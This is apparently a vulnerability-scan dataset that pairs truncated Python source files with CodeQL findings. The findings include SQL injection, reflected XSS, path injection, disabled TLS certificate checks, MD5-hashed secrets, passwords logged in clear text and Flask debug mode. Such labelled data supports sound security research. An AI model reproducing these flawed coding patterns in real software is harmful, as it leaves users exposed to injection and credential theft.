2024-11-18T19:29:33.919847+00:00
1,487,016,061,000
8a8dc2f20bbbfd281f6ce224dffc5351ca360800
2
{ "blob_id": "8a8dc2f20bbbfd281f6ce224dffc5351ca360800", "branch_name": "refs/heads/master", "committer_date": 1487016061000, "content_id": "c9c8083f8ec8d9859da27e1b094ed39773c84c3b", "detected_licenses": [ "Apache-2.0" ], "directory_id": "1eb27ae253cccf624079c1fb1041406ad248ac8b", "extension": "py"...
2.359375
stackv2
#!/usr/bin/env python3 # # Copyright 2017 Peter Schmidt # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable la...
74
37.41
139
15
699
python
[{"finding_id": "codeql_py/request-without-cert-validation_038280b21fc261e8_34f478b2", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
2
true
[ "CWE-295", "CWE-295" ]
[ "py/request-without-cert-validation", "py/request-without-cert-validation" ]
[ "MEDIUM", "MEDIUM" ]
[ "MEDIUM", "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1).", "This request may run without certificate validation because [it is disabled](1)." ]
[ 54, 58 ]
[ null, null ]
[ 5, 9 ]
[ 140, 140 ]
2024-11-18T19:44:13.218191+00:00
1,614,885,074,000
34d3a25e1631847bba9093e13cd7044d07d31345
3
{ "blob_id": "34d3a25e1631847bba9093e13cd7044d07d31345", "branch_name": "refs/heads/main", "committer_date": 1614885074000, "content_id": "5e4f95bb4e495ade81c10295c43ab2dfc2d9171e", "detected_licenses": [ "MIT" ], "directory_id": "adea6c5df0c4a5262421e6fa9d10f2e0ffe03977", "extension": "py", "file...
3.03125
stackv2
import streamlit as st import sqlite3 import gensim from operator import itemgetter import matplotlib.pyplot as plt from sklearn.manifold import TSNE @st.cache(allow_output_mutation=True) def load_my_model(): with st.spinner('Downloading word2vec model... please hold...'): model = gensim.models.KeyedVecto...
72
29.58
89
17
533
python
[{"finding_id": "codeql_py/sql-injection_985b3b3ca180653c_3249df2e", "tool_name": "codeql", "rule_id": "py/sql-injection", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This SQL query depends on a [user-provided value](1).", "remediation": "", "location": {"file_path": "unknown...
1
true
[ "CWE-089" ]
[ "py/sql-injection" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This SQL query depends on a [user-provided value](1)." ]
[ 25 ]
[ null ]
[ 19 ]
[ 85 ]
2024-11-18T19:44:15.554692+00:00
1,691,154,790,000
00c1f85a5d502815249e91a0042789fe7702dbfe
3
{ "blob_id": "00c1f85a5d502815249e91a0042789fe7702dbfe", "branch_name": "refs/heads/master", "committer_date": 1691154790000, "content_id": "f43c7656ac20edb10070c589be5187da3f110bf9", "detected_licenses": [ "Apache-2.0" ], "directory_id": "4491549f0b1bbf5397ae0b56192605a7abcb61b0", "extension": "py"...
2.84375
stackv2
# import re from flask import Flask, render_template, request, url_for, redirect, session from json import dumps from random import randint, choice from db.db import seed_db from db.users import get_user_by_id, get_user, create_user, get_user_by_username, get_all_user app = Flask(__name__, static_url_path='/static'...
143
29.22
127
18
1,030
python
[{"finding_id": "codeql_py/reflective-xss_f2ac926e40f15ec5_f38b1fc1", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi...
1
true
[ "CWE-079" ]
[ "py/reflective-xss" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Cross-site scripting vulnerability due to a [user-provided value](1)." ]
[ 45 ]
[ null ]
[ 20 ]
[ 93 ]
2024-11-18T19:44:16.261057+00:00
1,634,525,846,000
47f304936682e8e42ca3bc1db59b883565b9e758
2
{ "blob_id": "47f304936682e8e42ca3bc1db59b883565b9e758", "branch_name": "refs/heads/master", "committer_date": 1634525846000, "content_id": "37936818db443066de1da3e334c32d44e4bfe15c", "detected_licenses": [ "MIT" ], "directory_id": "f01b2c34cfcd8b9eb263d950ade44c83a11e45de", "extension": "py", "fi...
2.453125
stackv2
import hashlib import requests import time _DEFAULT_API_URL = 'https://my.referralcandy.com/api/v1/' _API_METHODS = { 'get' : ['verify', 'referrals', 'referrer', 'contacts'], 'post': ['purchase', 'referral', 'signup', 'invite'] } class ReferralCandy: def __init__(self, access_id, secret_key): self...
36
34.11
88
16
302
python
[{"finding_id": "codeql_py/weak-sensitive-data-hashing_a952a237e7a2f609_a62754da", "tool_name": "codeql", "rule_id": "py/weak-sensitive-data-hashing", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Sensitive data (secret)](1) is used in a hashing algorithm (MD5) that is insecur...
1
true
[ "CWE-327" ]
[ "py/weak-sensitive-data-hashing" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Sensitive data (secret)](1) is used in a hashing algorithm (MD5) that is insecure." ]
[ 23 ]
[ null ]
[ 28 ]
[ 73 ]
2024-11-18T19:44:16.665689+00:00
1,519,477,992,000
274d48879dd228fda962a78c01f01c5a770fc34d
2
{ "blob_id": "274d48879dd228fda962a78c01f01c5a770fc34d", "branch_name": "refs/heads/master", "committer_date": 1519477992000, "content_id": "7513f715d941a25dd64aadcd897a5510d398b87c", "detected_licenses": [ "MIT" ], "directory_id": "ae05e74f8dafbd7194c6d3647f420876cd466615", "extension": "py", "fi...
2.375
stackv2
"""JSON API.""" import os import functools from flask import Blueprint, jsonify, g, request from werkzeug.utils import secure_filename from beancount.core import data from beancount.core.amount import Amount from beancount.core.number import D from beancount.scripts.format import align_beancount from fava import uti...
220
30.4
77
17
1,490
python
[{"finding_id": "codeql_py/reflective-xss_bd8f9bfba9fa96b8_8efcd551", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi...
5
true
[ "CWE-079", "CWE-022", "CWE-022", "CWE-022", "CWE-022" ]
[ "py/reflective-xss", "py/path-injection", "py/path-injection", "py/path-injection", "py/path-injection" ]
[ "HIGH", "HIGH", "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "Cross-site scripting vulnerability due to a [user-provided value](1).", "This path depends on a [user-provided value](1).\nThis path depends on a [user-provided value](1).", "This path depends on a [user-provided value](1).", "This path depends on a [user-provided value](1).", "This path depends on a [user...
[ 148, 137, 140, 141, 143 ]
[ null, null, null, null, null ]
[ 12, 23, 27, 21, 17 ]
[ 58, 31, 36, 30, 25 ]
2024-11-18T19:44:31.461618+00:00
1,541,437,631,000
db033f0cb7e9bb616fc636131e85e5e647970ffa
3
{ "blob_id": "db033f0cb7e9bb616fc636131e85e5e647970ffa", "branch_name": "refs/heads/master", "committer_date": 1541437631000, "content_id": "2ac593b921fdc3facecdd2e62b931683dc2dd0a1", "detected_licenses": [ "MIT" ], "directory_id": "7eab9fa9a7f9bbf272e61f19524447678ee74294", "extension": "py", "fi...
2.671875
stackv2
from flask import Flask, render_template, request #imports flask and flask CORS (this allows us to make our from flask_cors import CORS #server) app = Flask(__name__) #initializes the app CORS(app) #allows cross-origin sharing (meaning anyone can send requests to the app) counter = 0 #this makes counter global (we nee...
59
41.36
158
22
660
python
[{"finding_id": "codeql_py/reflective-xss_8a6ee9410a858a93_6985409a", "tool_name": "codeql", "rule_id": "py/reflective-xss", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "Cross-site scripting vulnerability due to a [user-provided value](1).", "remediation": "", "location": {"fi...
1
true
[ "CWE-079" ]
[ "py/reflective-xss" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Cross-site scripting vulnerability due to a [user-provided value](1)." ]
[ 19 ]
[ null ]
[ 16 ]
[ 30 ]
2024-11-18T19:44:43.833243+00:00
1,533,610,948,000
7eb2915068389606a3a7715100ce6b891a4bda0c
3
{ "blob_id": "7eb2915068389606a3a7715100ce6b891a4bda0c", "branch_name": "refs/heads/master", "committer_date": 1533610948000, "content_id": "a193de5625b9add12d1c59eb60dd8a26514d6d68", "detected_licenses": [ "Apache-2.0" ], "directory_id": "c992cfc718f17672097ad890852d312dbeed3cc3", "extension": "py"...
2.625
stackv2
from __future__ import absolute_import from __future__ import division from __future__ import print_function import json import logging from jinja2 import Template def gen_tensorflow_client_string(generated_tensor_data, model_name): """ Generate TensorFlow SDK in Golang. Args: generated_tensor_data: Exam...
74
25.58
134
11
507
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_87bbac0295df4fd3_f4e0d911", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 57 ]
[ null ]
[ 14 ]
[ 37 ]
2024-11-18T20:10:10.150121+00:00
1,367,715,349,000
61713541148808f73ff1809165e9a619c5e78106
2
{ "blob_id": "61713541148808f73ff1809165e9a619c5e78106", "branch_name": "refs/heads/master", "committer_date": 1367715349000, "content_id": "ff2f0542496bc0b5671caa01aff673d7d4742983", "detected_licenses": [ "BSD-2-Clause-Views" ], "directory_id": "eb104109f51134815aab5c6a9124dda3c1bab858", "extensio...
2.421875
stackv2
#!/usr/bin/env python2 # -* coding: utf-8 -*- import sys, os from optparse import OptionParser from paramiko import SSHClient, AutoAddPolicy if __name__ == "__main__": src_dir = "hdiff" USAGE = "{} [options] hostname source_dir dest_dir".format(sys.argv[0]) parser = OptionParser(usage=USAGE) parser.a...
47
34.64
86
17
428
python
[{"finding_id": "codeql_py/paramiko-missing-host-key-validation_e19c8f67e1b54b82_e95389e0", "tool_name": "codeql", "rule_id": "py/paramiko-missing-host-key-validation", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Setting missing host key policy to AutoAddPolicy may be unsafe.", "r...
1
true
[ "CWE-295" ]
[ "py/paramiko-missing-host-key-validation" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "Setting missing host key policy to AutoAddPolicy may be unsafe." ]
[ 33 ]
[ null ]
[ 9 ]
[ 60 ]
2024-11-18T20:23:14.500852+00:00
1,635,775,068,000
7e6e385edce66bd8aa7c67a75ff680094e855e14
3
{ "blob_id": "7e6e385edce66bd8aa7c67a75ff680094e855e14", "branch_name": "refs/heads/main", "committer_date": 1635775068000, "content_id": "207246d605373d43d97640c7ea9dc859c26e70ca", "detected_licenses": [ "MIT" ], "directory_id": "5e9b26168efa4e2f133c669bb13227a8a4f7b55e", "extension": "py", "file...
2.984375
stackv2
import requests def thumbnail(video, quality='sd'): """ video: id - video id link - video link quality: sd - Standard Quality mq - Medium Quality hq - High Quality maxres - Maximum Resolution """ qualities = ["sd", "mq", "hq", "maxres"] if ("youtube.com" i...
44
24.09
77
13
277
python
[{"finding_id": "codeql_py/incomplete-url-substring-sanitization_6a8ba5139a919ffa_f9f03e69", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [youtube.com](1) may be at an arbitrary position in the...
1
true
[ "CWE-020" ]
[ "py/incomplete-url-substring-sanitization" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "The string [youtube.com](1) may be at an arbitrary position in the sanitized URL." ]
[ 16 ]
[ null ]
[ 9 ]
[ 31 ]
2024-11-18T20:23:21.067069+00:00
1,627,746,488,000
214fc4076a1800188c7cf9457efa917744a8c21a
2
{ "blob_id": "214fc4076a1800188c7cf9457efa917744a8c21a", "branch_name": "refs/heads/master", "committer_date": 1627746488000, "content_id": "d60e9bbc41ca67bf0fd9d7b2e8f469c172b1a967", "detected_licenses": [ "MIT" ], "directory_id": "e8887cc3a82a3c0e62f4cfbd84628652dbee7b67", "extension": "py", "fi...
2.421875
stackv2
from datetime import datetime from utils import env from db import get_database import urllib.parse from pymongo.collection import Collection from bson.objectid import ObjectId import requests from base64 import b64encode from typing import Union from notion_api import NotionAPI db = get_database() users = db["users"...
206
35.02
114
22
1,705
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_0245bd6193584ada_6b913d49", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (secret)](1) as clear text.", "r...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (secret)](1) as clear text." ]
[ 66 ]
[ null ]
[ 15 ]
[ 28 ]
2024-11-18T20:23:31.353267+00:00
1,629,014,991,000
70948e60a7ac79bedf8c9b1c68a4e79e1ff4830a
2
{ "blob_id": "70948e60a7ac79bedf8c9b1c68a4e79e1ff4830a", "branch_name": "refs/heads/main", "committer_date": 1629014991000, "content_id": "5828e3ecf59434f256e7ac5c14507e088fd9bdb6", "detected_licenses": [ "MIT" ], "directory_id": "56e9190b61e46285ea16aa5042609e3c0a29cf25", "extension": "py", "file...
2.40625
stackv2
# Made with python3 # (C) @FayasNoushad # Copyright permission under MIT License # All rights reserved by FayasNoushad # License -> https://github.com/FayasNoushad/URL-Shortner-Bot/blob/main/LICENSE import os import aiohttp from pyrogram import Client, filters from pyrogram.types import InlineKeyboardButton, InlineKey...
211
30.13
120
17
1,659
python
[{"finding_id": "codeql_py/incomplete-url-substring-sanitization_748ccefc36e186bb_2ae87c90", "tool_name": "codeql", "rule_id": "py/incomplete-url-substring-sanitization", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "The string [github.com](1) may be at an arbitrary position in the ...
2
true
[ "CWE-020", "CWE-020" ]
[ "py/incomplete-url-substring-sanitization", "py/incomplete-url-substring-sanitization" ]
[ "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM" ]
[ "The string [github.com](1) may be at an arbitrary position in the sanitized URL.", "The string [github.io](1) may be at an arbitrary position in the sanitized URL." ]
[ 107, 107 ]
[ null, null ]
[ 8, 32 ]
[ 28, 51 ]
2024-11-18T20:23:41.268629+00:00
1,535,549,381,000
3167c71bf91e204926a399452b738ef764dd9a91
3
{ "blob_id": "3167c71bf91e204926a399452b738ef764dd9a91", "branch_name": "refs/heads/master", "committer_date": 1535549381000, "content_id": "590723b25de3502953022407fe1f633e44498e96", "detected_licenses": [ "MIT" ], "directory_id": "c30c754f0853250d1d6c042ea5369be2470b49b2", "extension": "py", "fi...
2.71875
stackv2
import requests import ratelimit from arcas.tools import Api from .api_key import api_key from arcas.tools import APIError class Ieee(Api): """ API argument is 'ieee'. """ def __init__(self): self.standard = 'https://ieeexploreapi.ieee.org/api/v1/search/articles?' self.key_api = api_...
99
34.84
101
16
743
python
[{"finding_id": "codeql_py/request-without-cert-validation_bfb9fb964adc144d_4adc5df2", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
1
true
[ "CWE-295" ]
[ "py/request-without-cert-validation" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1)." ]
[ 31 ]
[ null ]
[ 20 ]
[ 64 ]
2024-11-18T20:49:26.114077+00:00
1,581,051,029,000
a660c89f26278eeee3ce15a4ef1c61679f31faee
3
{ "blob_id": "a660c89f26278eeee3ce15a4ef1c61679f31faee", "branch_name": "refs/heads/master", "committer_date": 1581051029000, "content_id": "936e2c92ac8329de14733141224b80dc2f316488", "detected_licenses": [ "MIT" ], "directory_id": "85305bfc5fa09dba9bdea515099090b018ad988b", "extension": "py", "fi...
2.578125
stackv2
import pymongo import os from dotenv import load_dotenv load_dotenv() DB_USER = os.getenv("MONGO_USER", default="OOPS") DB_PASSWORD = os.getenv("MONGO_PASSWORD", default="OOPS") CLUSTER_NAME = os.getenv("MONGO_CLUSTER_NAME", default="OOPS") connection_uri = f"mongodb+srv://{DB_USER}:{DB_PASSWORD}@{CLUSTER_NAME}-8evf9....
31
31.03
123
10
249
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_8c4aaece23da68dc_67ab9117", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 11 ]
[ null ]
[ 15 ]
[ 29 ]
2024-11-18T20:49:27.365868+00:00
1,461,190,415,000
caa263b4f1f53f2dcdba9a9847e6e46751c7f925
3
{ "blob_id": "caa263b4f1f53f2dcdba9a9847e6e46751c7f925", "branch_name": "refs/heads/master", "committer_date": 1461190415000, "content_id": "4c3fd34a97ed6f2866d900b719d1789c19eae61b", "detected_licenses": [ "MIT" ], "directory_id": "7ffafa0c90d469602646fd3ff773303caeb48203", "extension": "py", "fi...
2.875
stackv2
import os, sys, requests, re, json _api_key = None def _get_api_key(): global _api_key if _api_key is None: api_key_file = os.path.expanduser('~/.gcloud/myapp.api-key') if not os.path.isfile(api_key_file): raise Exception(''' You have to configure credentials before this script ...
110
35.49
143
17
978
python
[{"finding_id": "codeql_py/bad-tag-filter_543c2a3273138125_90c80690", "tool_name": "codeql", "rule_id": "py/bad-tag-filter", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "This regular expression does not match script tags where the attribute uses single-quotes.", "remediation": "", ...
1
true
[ "CWE-116" ]
[ "py/bad-tag-filter" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This regular expression does not match script tags where the attribute uses single-quotes." ]
[ 23 ]
[ null ]
[ 26 ]
[ 136 ]
2024-11-18T20:49:33.621843+00:00
1,505,828,771,000
48b2af098352aa28e508f7fce160ac2d7a6e97ef
2
{ "blob_id": "48b2af098352aa28e508f7fce160ac2d7a6e97ef", "branch_name": "refs/heads/master", "committer_date": 1505828771000, "content_id": "bb2adce0236579635049d58bd3bd983a6d0c0163", "detected_licenses": [ "MIT" ], "directory_id": "6e6d906c3aeba3c6e03fbd4b94ee7581c66fd877", "extension": "py", "fi...
2.390625
stackv2
from flask import Flask, abort, request, make_response, current_app , Response from pprint import pprint as pp from json import dumps from werkzeug.http import HTTP_STATUS_CODES import re from flatapi.resource import * import sys try: from urlparse import parse_qsl except ImportError: from urllib.parse import...
173
28.45
93
18
1,217
python
[{"finding_id": "codeql_py/stack-trace-exposure_a9b4b1dd8db3a3b3_cd257bd9", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.\n[S...
1
true
[ "CWE-209" ]
[ "py/stack-trace-exposure" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Stack trace information](1) flows to this location and may be exposed to an external user.\n[Stack trace information](2) flows to this location and may be exposed to an external user.\n[Stack trace information](3) flows to this location and may be exposed to an external user.\n[Stack trace information](4) flows t...
[ 74 ]
[ null ]
[ 26 ]
[ 32 ]
2024-11-18T20:49:57.585756+00:00
1,415,987,631,000
9a5490c6a878aabb3833d1dc4040f68c7eacf5d7
3
{ "blob_id": "9a5490c6a878aabb3833d1dc4040f68c7eacf5d7", "branch_name": "refs/heads/master", "committer_date": 1415987631000, "content_id": "5941945c3403881265e395fdeb8ac61ae7dff853", "detected_licenses": [ "BSD-2-Clause" ], "directory_id": "a35f869396afdad093da5e68dfacc3ddbe8bef85", "extension": "p...
2.9375
stackv2
# -*- coding: utf-8 -*- import argparse import os from collections import namedtuple from jinja2 import Environment, FileSystemLoader from codecs import open import re Item = namedtuple('Item', ('src', 'title', 'author', 'slug')) def render_template(template, **kwargs): env = Environment(loader=FileSystemLoader(...
53
30.6
69
16
385
python
[{"finding_id": "codeql_py/jinja2/autoescape-false_456a3ff22f5e0041_925df0e9", "tool_name": "codeql", "rule_id": "py/jinja2/autoescape-false", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "Using jinja2 templates with autoescape=False can potentially allow XSS attacks.", "remediati...
1
true
[ "CWE-079" ]
[ "py/jinja2/autoescape-false" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "Using jinja2 templates with autoescape=False can potentially allow XSS attacks." ]
[ 13 ]
[ null ]
[ 11 ]
[ 52 ]
2024-11-18T20:50:36.789866+00:00
1,676,139,610,000
7a587091306cff16f54de8e62c0d8c714da63d0a
3
{ "blob_id": "7a587091306cff16f54de8e62c0d8c714da63d0a", "branch_name": "refs/heads/master", "committer_date": 1676139610000, "content_id": "07423c79877c031b0cdeb9cd94d71105744dce59", "detected_licenses": [ "MIT" ], "directory_id": "255e19ddc1bcde0d3d4fe70e01cec9bb724979c9", "extension": "py", "fi...
2.9375
stackv2
#!/usr/bin/python2.7 import sys def gftp_descrable_password(password): """gftp password descrambler This code has been released in the Public Domain by the original author. """ if not password.startswith('$'): return password newpassword = [] pwdparts = map(ord, password) for i i...
28
26.5
77
18
220
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_7b18a5ef22721f6e_561ed853", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text.\nThis expression logs [sensitive data (password)](3) as clear text." ]
[ 25 ]
[ null ]
[ 22 ]
[ 77 ]
2024-11-18T20:50:45.982713+00:00
1,520,513,776,000
1f1dccace04f1551446937c1ac29de2d42cfa793
3
{ "blob_id": "1f1dccace04f1551446937c1ac29de2d42cfa793", "branch_name": "refs/heads/master", "committer_date": 1520513776000, "content_id": "45c4e630f2feadd57e0348cf9ff1bbab7b78cb34", "detected_licenses": [ "MIT" ], "directory_id": "07ce39672a88b01d91b8e9138699e82ee530f159", "extension": "py", "fi...
3.3125
stackv2
from string import digits, ascii_letters from time import time def get_next_password(local, cur): ind = len(cur) - 1 last_letter = cur[ind] if cur[ind] != local[len(local) - 1]: last_letter = local[local.index(last_letter) + 1] return cur[0:ind] + last_letter else: for i in range(ind - 1, -1, -1): if cur[...
39
25.33
78
20
306
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_1f5cc9cec80b4124_61633111", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.\nT...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text.\nThis expression logs [sensitive data (password)](2) as clear text." ]
[ 33 ]
[ null ]
[ 10 ]
[ 78 ]
2024-11-18T20:50:53.715772+00:00
1,604,653,091,000
3f45767bf28ac1108473bfcc13f72d900f952498
3
{ "blob_id": "3f45767bf28ac1108473bfcc13f72d900f952498", "branch_name": "refs/heads/master", "committer_date": 1604653091000, "content_id": "da3f0644a7e6545157a3971a7eab532b55a7660f", "detected_licenses": [ "MIT" ], "directory_id": "34ba661c593167e2aaa4da6cda5a638524ea8823", "extension": "py", "fi...
2.96875
stackv2
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Sample script to get System ID LED status via iRMC Redfish API in Fujitsu PRIMERGY """ import sys import argparse import requests import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) __author__ = "Masahiro Murayama" __version__ = "0.0...
55
24.69
79
15
369
python
[{"finding_id": "codeql_py/request-without-cert-validation_d02df60858abd7bd_1164bb72", "tool_name": "codeql", "rule_id": "py/request-without-cert-validation", "finding_type": "problem", "severity": "medium", "confidence": "medium", "message": "This request may run without certificate validation because [it is disabled]...
1
true
[ "CWE-295" ]
[ "py/request-without-cert-validation" ]
[ "MEDIUM" ]
[ "MEDIUM" ]
[ "This request may run without certificate validation because [it is disabled](1)." ]
[ 21 ]
[ null ]
[ 16 ]
[ 70 ]
2024-11-18T20:50:55.764625+00:00
1,591,063,393,000
478ce44f5ebb8882efdf656d0b8a598fd6cdfb2b
3
{ "blob_id": "478ce44f5ebb8882efdf656d0b8a598fd6cdfb2b", "branch_name": "refs/heads/master", "committer_date": 1591063393000, "content_id": "904df374ec2961805a29c9d1e859538bfceffc9d", "detected_licenses": [ "MIT" ], "directory_id": "c24cdd5d7cd7982b307152268c430082b1a8ae70", "extension": "py", "fi...
2.703125
stackv2
from aiohttp import web from functools import wraps from threading import Thread from multidict import MultiDict import sys import json class AbstractHandler: routes = web.RouteTableDef() cors_header = MultiDict({'Access-Control-Allow-Origin': 'http://localhost:8080'}) def __init__(self): pass ...
55
31.55
100
20
366
python
[{"finding_id": "codeql_py/stack-trace-exposure_5942b70250186e1f_df6eabe6", "tool_name": "codeql", "rule_id": "py/stack-trace-exposure", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "[Stack trace information](1) flows to this location and may be exposed to an external user.", "...
1
true
[ "CWE-209" ]
[ "py/stack-trace-exposure" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "[Stack trace information](1) flows to this location and may be exposed to an external user." ]
[ 30 ]
[ null ]
[ 54 ]
[ 60 ]
2024-11-18T20:51:27.706131+00:00
1,526,045,269,000
c91c895b208e5d4db7200dbdceaaa407cfd8e181
3
{ "blob_id": "c91c895b208e5d4db7200dbdceaaa407cfd8e181", "branch_name": "refs/heads/master", "committer_date": 1526045269000, "content_id": "0397953b9ca27dc8f089623587dab7ff39dc26b4", "detected_licenses": [ "MIT" ], "directory_id": "4cb5bc85920617f0c99a0f417ab8cc8ca974dda6", "extension": "py", "fi...
2.671875
stackv2
import json import subprocess def create_accounts(domain, username, password): cmd = "ejabberdctl register {} {} {}".format(username, domain, password) print(cmd) subprocess.call(cmd) def forge_relations(user1,user2,domain): cmd1 = "ejabberdctl add-rosteritem {} {} {} {} {}-{} groupvpn both"\ ...
30
30.43
76
11
241
python
[{"finding_id": "codeql_py/clear-text-logging-sensitive-data_28e488a423895390_aa3f52bf", "tool_name": "codeql", "rule_id": "py/clear-text-logging-sensitive-data", "finding_type": "path-problem", "severity": "medium", "confidence": "high", "message": "This expression logs [sensitive data (password)](1) as clear text.", ...
1
true
[ "CWE-312" ]
[ "py/clear-text-logging-sensitive-data" ]
[ "HIGH" ]
[ "MEDIUM" ]
[ "This expression logs [sensitive data (password)](1) as clear text." ]
[ 7 ]
[ null ]
[ 11 ]
[ 14 ]
2024-11-18T20:51:28.529988+00:00
1,620,905,511,000
bffa9fd177bb9aa5154d250f73fa5d2582dab35e
3
{ "blob_id": "bffa9fd177bb9aa5154d250f73fa5d2582dab35e", "branch_name": "refs/heads/master", "committer_date": 1620905511000, "content_id": "7b4e5744d7add52badbd56f05c9952c77118c898", "detected_licenses": [ "Apache-2.0" ], "directory_id": "7cebfa2066e679e19993a5507e59d1979df3d4a8", "extension": "py"...
3.0625
stackv2
from flask import Flask import sqlite3 as sql app = Flask(__name__) # routing @app.route("/") def hello(): print("hello called") return "Hello World!" ''' or add url rule using add_url_rule function def hello_world(): return ‘hello world’ app.add_url_rule(‘/’, ‘hello’, hello_world) ''' # accepting a s...
41
22.76
103
9
266
python
[{"finding_id": "codeql_py/flask-debug_e8e08fde8310a7bf_b9a53cd9", "tool_name": "codeql", "rule_id": "py/flask-debug", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", ...
4
true
[ "CWE-215", "CWE-079", "CWE-079", "CWE-079" ]
[ "py/flask-debug", "py/reflective-xss", "py/reflective-xss", "py/reflective-xss" ]
[ "HIGH", "HIGH", "HIGH", "HIGH" ]
[ "MEDIUM", "MEDIUM", "MEDIUM", "MEDIUM" ]
[ "A Flask app appears to be run in debug mode. This may allow an attacker to run arbitrary code through the debugger.", "Cross-site scripting vulnerability due to a [user-provided value](1).", "Cross-site scripting vulnerability due to a [user-provided value](1).", "Cross-site scripting vulnerability due to a ...
[ 39, 24, 30, 36 ]
[ null, null, null, null ]
[ 5, 12, 12, 12 ]
[ 24, 27, 25, 33 ]
2024-11-18T21:13:56.052202+00:00
1,497,980,933,000
638a8fa2c262299443ccca12c907e8c585ade5b5
3
{ "blob_id": "638a8fa2c262299443ccca12c907e8c585ade5b5", "branch_name": "refs/heads/master", "committer_date": 1497980933000, "content_id": "69092b371b7638c72c9bcc1296208d7c756beda1", "detected_licenses": [ "MIT" ], "directory_id": "15e2efc70523f1e0bda3b9339cc520883d301abb", "extension": "py", "fi...
3.375
stackv2
"""MIT License Copyright (c) 2017 Uka Osim Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distr...
56
38.46
90
17
480
python
[{"finding_id": "codeql_py/overly-large-range_9d50cc9d3e5c992a_cba54a3c", "tool_name": "codeql", "rule_id": "py/overly-large-range", "finding_type": "problem", "severity": "medium", "confidence": "high", "message": "Suspicious character range that overlaps with \\w in the same character class.", "remediation": "", "loc...
2
true
[ "CWE-020", "CWE-020" ]
[ "py/overly-large-range", "py/overly-large-range" ]
[ "HIGH", "HIGH" ]
